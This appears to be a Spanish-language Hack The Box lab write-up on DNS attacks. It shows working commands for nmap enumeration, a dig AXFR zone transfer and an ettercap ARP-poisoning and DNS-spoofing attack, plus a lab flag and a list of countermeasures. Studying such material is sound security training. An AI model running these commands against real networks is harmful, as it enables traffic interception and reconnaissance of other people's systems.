Attacking DNS · matoriusbig

¿Qué es el DNS?

Cuando escribes google.com en tu navegador, tu computador no sabe a qué servidor conectarse. Las computadoras solo entienden números (IPs), no nombres. El DNS es básicamente la guía telefónica de Internet: tú buscas el nombre, él te da el número.

# Flujo de resolución DNS
Tú escribes: google.com
Tu PC → DNS: "¿cuál es la IP de google.com?"
DNS   → PC:  142.250.80.46
Tu navegador se conecta a 142.250.80.46 → Google

[ INFO ]

DNS opera por defecto sobre UDP/53, pero usa TCP/53 para transferencias de zona por su mayor fiabilidad.

Vectores

[ATK-01]

Zone Transfer

Servidor DNS mal configurado entrega su base de datos completa a cualquiera que la solicite sin autenticación.

[ATK-02]

Subdomain Takeover

Registro CNAME apunta a un servicio externo expirado que puede ser reclamado por el atacante.

[ATK-03]

DNS Cache Poisoning

Posición MITM en la red local permite responder consultas DNS con IPs falsas antes que el servidor legítimo.

Enumeración

Antes de atacar, confirmamos que el servidor DNS está activo y obtenemos su versión:

╰─ nmap -p53 -Pn -sV -sC 10.129.203.6

PORT    STATE  SERVICE  VERSION
53/tcp  open   domain   ISC BIND 9.11.3-1ubuntu1.2

[ TIP ]

Versiones antiguas de ISC BIND tienen vulnerabilidades públicas documentadas. Busca el string de versión en searchsploit bind antes de continuar.

Explotación

ATK-01 · Zone Transfer (AXFR)

El servidor primario debería verificar quién le hace la petición y entregarla solo a sus secundarios. Pero muchos administradores no configuran eso correctamente.

[ DANGER ]

Si el servidor no restringe qué IPs pueden solicitar una transferencia de zona, cualquier atacante puede obtener el mapa completo de la red interna con una sola consulta.

╰─ dig AXFR @10.129.56.120 inlanefreight.htb

inlanefreight.htb.         604800  IN  SOA    localhost. root.localhost.
admin.inlanefreight.htb.   604800  IN  A      10.129.110.21
hr.inlanefreight.htb.      604800  IN  A      10.129.110.25
support.inlanefreight.htb. 604800  IN  A      10.129.110.28

ATK-02 · Subdomain Takeover

Un registro CNAME es un alias DNS. Si una empresa elimina el bucket de AWS pero olvida borrar el CNAME, cualquiera puede registrar ese bucket y tomar control del subdominio legítimo.

[ WARNING ]

Si el servidor valida la IP solicitante, el AXFR fallará. En ese caso, pasar directamente a enumeración de subdominios con Subfinder o Subbrute.

ATK-03 · DNS Cache Poisoning con Ettercap

El ataque consiste en meter una respuesta falsa en el caché DNS. Si logramos que la víctima guarde inlanefreight.com = NUESTRA_IP, cada vez que intente visitarlo llegará a nuestro servidor.

# Habilitar IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

# Lanzar ARP poisoning + DNS spoof con Ettercap
ettercap -T -q -i eth0 -M arp:remote /GATEWAY_IP// /VICTIM_IP// \
  -P dns_spoof

Write-up HTB

🚩 FLAG 1 OBTENIDA

HTB{LUIHNFAS2871SJK1259991}

Resumen

Los tres ataques se encadenan en una progresión lógica dentro de un pentest real: enumeración → zone transfer → subdomain takeover → cache poisoning. Cada vector aprovecha una asunción débil del protocolo o de su configuración.

Conclusión

El DNS es un protocolo fundamental que, cuando está mal configurado o no se monitorea adecuadamente, se convierte en una de las fuentes de información más ricas para un atacante. Restringir transferencias de zona a IPs autorizadas, auditar registros CNAME y monitorear tráfico DNS son contramedidas básicas que muchas organizaciones aún no implementan correctamente.

COMPARTIR ESTE POST

// COMENTARIOS · GISCUS

Los comentarios se sincronizan con GitHub Discussions. Inicia sesión con GitHub →